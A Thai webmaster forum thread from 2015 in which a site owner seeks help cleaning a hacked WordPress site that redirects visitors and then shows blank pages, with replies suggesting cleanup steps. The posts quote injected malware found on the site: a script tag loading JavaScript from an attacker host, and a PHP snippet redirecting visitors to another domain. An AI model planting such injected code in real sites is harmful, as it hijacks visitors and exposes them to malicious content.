ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์Programmingเข้า Wordpress แล้วเป็นหน้าขาวๆ ไม่แสดงข้อมูลอะไรเลยครับ
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: เข้า Wordpress แล้วเป็นหน้าขาวๆ ไม่แสดงข้อมูลอะไรเลยครับ  (อ่าน 1892 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
amino10
คนรักเสียว
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 101



ดูรายละเอียด
« เมื่อ: 27 มิถุนายน 2015, 10:01:02 »

สวัสดีครับทุกๆท่าน

ตอนนี้ผมเปิดเว็ป Planforfit.com อยู่ ซึ่งก็ใช้งานอะไรได้ตามปกติ

แต่วันที่ 22 เว็ปโดนแฮค  จากนั้นเอาโค๊ดกับข้อมูลที่ backup ไว้มาใช้   (ภาพ  http://bit.ly/1dmXNJf  )
วันที่ 24 เจอปัญหาว่า พอเข้าเว็ปแล้วจะ redirect ไปที่ Shoppingfordress.com  ซึ่งบางครั้งเปิดก็ไม่รี
เลยไปมัคร sucuri  ให้เค้าเช็คเว็ปและลบ malware ให้ หลังจากลบเสร็จแล้ว ก็ยัง redirect ไปที่ Shoppingfordress.comอยู่


กลับไล่ดูอีกครั้งเจอว่าแฮคเกอร์ฝังโค๊ดเอาไว้ตรง widget     มีสร้าง admin เอาไว้
Home<script src=http://a.c0594.com/?js=1></script></a>
(ภาพ  http://bit.ly/1IBfduA )

ก็ทำการลบออกไปทั้งหมด  แต่ก็ยังไม่หาย

จากนั้น string locator ออกมา  ในไฟล์ wp-config.php มันมีตัวนึงโผล่ขึ้นมา

define('DISALLOW_FILE_EDIT',true);  ไป comment out ออก

  sucuri เช็คอีกครั้ง จนสุดท้ายแล้ว ไม่ Redirect ไปหน้าอื่นแล้วครับ

แต่ดันมาเจอปัญหาคือ บางคนเข้าไปที่เว็ปแล้ว มันเป็นหน้าขาวๆ  ไม่มีข้อมูลอะไรขึ้นมาเลยครับ
(ภาพ http://bit.ly/1HlBZtQ )

เท่าที่ลองสังเกตุ
- เวลาเปิดผ่านมือถือ จะเจออากาาหน้าขาวๆ มากกว่าเปิดผ่าน destop
- เวลาเปิดช่วงคนเข้าเยอะ ( 2-5 ทุ่ม) จะเป็นบ่อย


ตอนนี้ไม่รู้จะแก้ยังไงแล้วครับ  รบกวนขอคำแนะนำจากพี่ๆในนี้ครับ

ขอขอบคุณล่วงหน้าครับ
« แก้ไขครั้งสุดท้าย: 27 มิถุนายน 2015, 10:02:33 โดย amino10 » บันทึกการเข้า
Jir4yu
สมุนแก๊งเสียว
*

พลังน้ำใจ: 162
ออฟไลน์ ออฟไลน์

กระทู้: 822



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 27 มิถุนายน 2015, 12:16:23 »

เบื้องต้นลองแก้ wp-config.php ให้แสดงข้อความ dedug ดูก่อนครับ
WP_DEBUG เปลี่ยนค่าเป็น true แล้วลองดูผลลัพธ์ครับ
บันทึกการเข้า

ทำบุญ สถานที่ทำบุญ สายมู-สายธรรมะ - buacha.com
amino10
คนรักเสียว
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 101



ดูรายละเอียด
« ตอบ #2 เมื่อ: 29 มิถุนายน 2015, 06:17:57 »

ยังไม่หายครับ  T T
บันทึกการเข้า
kingofdollars
สมุนแก๊งเสียว
*

พลังน้ำใจ: 95
ออฟไลน์ ออฟไลน์

กระทู้: 830



ดูรายละเอียด
« ตอบ #3 เมื่อ: 29 มิถุนายน 2015, 07:45:36 »

เวลาผมเจอแบบนี้

เปลี่ยนชื่อ public_html เดิม เป็นชื่อใหม่  เอาไว้  backup
แล้วสร้าง public_html ใหม่  ลง wordpress ใหม่

แก้ config  ให้ชี้ไป Database ตัวเดิม ก็หายแล้วครับ
บันทึกการเข้า

shinrafenr
ก๊วนเสียว
*

พลังน้ำใจ: 17
ออฟไลน์ ออฟไลน์

กระทู้: 308



ดูรายละเอียด เว็บไซต์
« ตอบ #4 เมื่อ: 29 มิถุนายน 2015, 09:39:53 »

ลอง reset permalink ดูรึยังคับ
บันทึกการเข้า

อย่าปล่อยให้อดีตทำร้ายปัจจุบัน เพราะวันนึงเราจะพบว่า อดีต ไม่มีวันย้อนกลับมา และปัจจุบันก็ไม่มีอะไรให้จดจำ

ทำความรู้จักกันเพิ่มเติมได้ที่ -->  http://goo.gl/65mD27

รับจ้างเก็บภาพสถานที่ท่องเที่ยวทั่วไทย รับทําเว็บไซต์ ด้วย WordPress ว่างๆผมก็ออกเดินทางท่องเที่ยวทั่วไทย
BrainFreeze
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 498
ออฟไลน์ ออฟไลน์

กระทู้: 3,887



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 29 มิถุนายน 2015, 11:36:27 »

ลองทำตามนี้ครับส่วนใหญ่หายขาดไม่โดนอีก วิธีแก้ Wordpress ถูก Hack
https://support.hostatom.com/k...tion=displayarticle&id=318
บันทึกการเข้า

# จัดไป Promo Code ลด 11% : THAISEOBOARD
# hostatom.com |โฮสอะตอม - เว็บโฮสติ้งที่ Webmaster มืออาชีพไว้วางใจ
# Web Hosting | Cloud VPS | Reseller Hosting | Domain Name
# บริการ 24x7 | รับประกันความพอใจยินดีคืนเงิน | Uptime 99.9% | โทร : 0-2107-3466
amino10
คนรักเสียว
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 101



ดูรายละเอียด
« ตอบ #6 เมื่อ: 02 กรกฎาคม 2015, 23:01:40 »

โปรแกรมเมอร์ไปเจออีกคริป (ของแฮคเกอร์คนเดิม)

เป็น script ที่พยายามจะ redirect เหมือนกัน
$url = "http://com-7kb.net/?a=356179&a...;c=wl_garc&s=planforfitcom ";
exit('<script>document.location.href = "'.$url.'";</script>');


ซึ่งลบออกไปแล้วครับ

  ทั้งอัพไฟล์ wp ใหม่ ทั้ง theme
  ลบ plugin อื่นๆที่ไม่ใช้ ออกไปแล้ว

ตอนนี้ก็ยังมีอาการนี้อยู่ครับ

อาการจะเป็นแบบนี้ครับ
- เวลาเอาลิ้งบทความไปโพสใน FB หรือส่งลิ้งนี้ให้คนอื่นเปิด  บางลิ้งก็เป็นหน้าขาว บางลิ้งก็ไม่เป็นครับ   (แต่ถ้าเข้าเว็ปโดยตรง แล้วเสริชหาบทความนั้น สามารถเข้าได้ตามปกติ)
- ส่วนมากจะเป็นตอนที่เข้าผ่านมือถือ
- เป็นแล้วก็หายเองได้ครับ  ไม่ได้เป็นตลอดไปครับ


บันทึกการเข้า
BrainFreeze
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 498
ออฟไลน์ ออฟไลน์

กระทู้: 3,887



ดูรายละเอียด เว็บไซต์
« ตอบ #7 เมื่อ: 03 กรกฎาคม 2015, 00:33:51 »

โปรแกรมเมอร์ไปเจออีกคริป (ของแฮคเกอร์คนเดิม)

เป็น script ที่พยายามจะ redirect เหมือนกัน
$url = "http://com-7kb.net/?a=356179&a...;c=wl_garc&s=planforfitcom ";
exit('<script>document.location.href = "'.$url.'";</script>');


ซึ่งลบออกไปแล้วครับ

  ทั้งอัพไฟล์ wp ใหม่ ทั้ง theme
  ลบ plugin อื่นๆที่ไม่ใช้ ออกไปแล้ว

ตอนนี้ก็ยังมีอาการนี้อยู่ครับ

อาการจะเป็นแบบนี้ครับ
- เวลาเอาลิ้งบทความไปโพสใน FB หรือส่งลิ้งนี้ให้คนอื่นเปิด  บางลิ้งก็เป็นหน้าขาว บางลิ้งก็ไม่เป็นครับ   (แต่ถ้าเข้าเว็ปโดยตรง แล้วเสริชหาบทความนั้น สามารถเข้าได้ตามปกติ)
- ส่วนมากจะเป็นตอนที่เข้าผ่านมือถือ
- เป็นแล้วก็หายเองได้ครับ  ไม่ได้เป็นตลอดไปครับ



ถ้าเคยโดนเจาะแล้ว อาจต้องตรวจซ้ำดีๆ ครับ
- เชค database รึยังครับว่าไม่มีอะไรแปลกปลอมเหลืออยู่มั้ย
- อัพ wp เข้าไปทับ บางที่ hacker วาง backdoor ไว้ชื่อไฟล์อื่นมันไม่ทับให้นะครับ
บันทึกการเข้า

# จัดไป Promo Code ลด 11% : THAISEOBOARD
# hostatom.com |โฮสอะตอม - เว็บโฮสติ้งที่ Webmaster มืออาชีพไว้วางใจ
# Web Hosting | Cloud VPS | Reseller Hosting | Domain Name
# บริการ 24x7 | รับประกันความพอใจยินดีคืนเงิน | Uptime 99.9% | โทร : 0-2107-3466
amino10
คนรักเสียว
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 101



ดูรายละเอียด
« ตอบ #8 เมื่อ: 03 กรกฎาคม 2015, 06:22:04 »

โปรแกรมเมอร์ไปเจออีกคริป (ของแฮคเกอร์คนเดิม)

เป็น script ที่พยายามจะ redirect เหมือนกัน
$url = "http://com-7kb.net/?a=356179&a...;c=wl_garc&s=planforfitcom ";
exit('<script>document.location.href = "'.$url.'";</script>');


ซึ่งลบออกไปแล้วครับ

  ทั้งอัพไฟล์ wp ใหม่ ทั้ง theme
  ลบ plugin อื่นๆที่ไม่ใช้ ออกไปแล้ว

ตอนนี้ก็ยังมีอาการนี้อยู่ครับ

อาการจะเป็นแบบนี้ครับ
- เวลาเอาลิ้งบทความไปโพสใน FB หรือส่งลิ้งนี้ให้คนอื่นเปิด  บางลิ้งก็เป็นหน้าขาว บางลิ้งก็ไม่เป็นครับ   (แต่ถ้าเข้าเว็ปโดยตรง แล้วเสริชหาบทความนั้น สามารถเข้าได้ตามปกติ)
- ส่วนมากจะเป็นตอนที่เข้าผ่านมือถือ
- เป็นแล้วก็หายเองได้ครับ  ไม่ได้เป็นตลอดไปครับ



ถ้าเคยโดนเจาะแล้ว อาจต้องตรวจซ้ำดีๆ ครับ
- เชค database รึยังครับว่าไม่มีอะไรแปลกปลอมเหลืออยู่มั้ย
- อัพ wp เข้าไปทับ บางที่ hacker วาง backdoor ไว้ชื่อไฟล์อื่นมันไม่ทับให้นะครับ


เท่าที่ประเมินดูแล้ว คิดว่าทำใหม่น่าจะง่ายกว่าครับ T T
บันทึกการเข้า
หน้า: [1]   ขึ้นบน
พิมพ์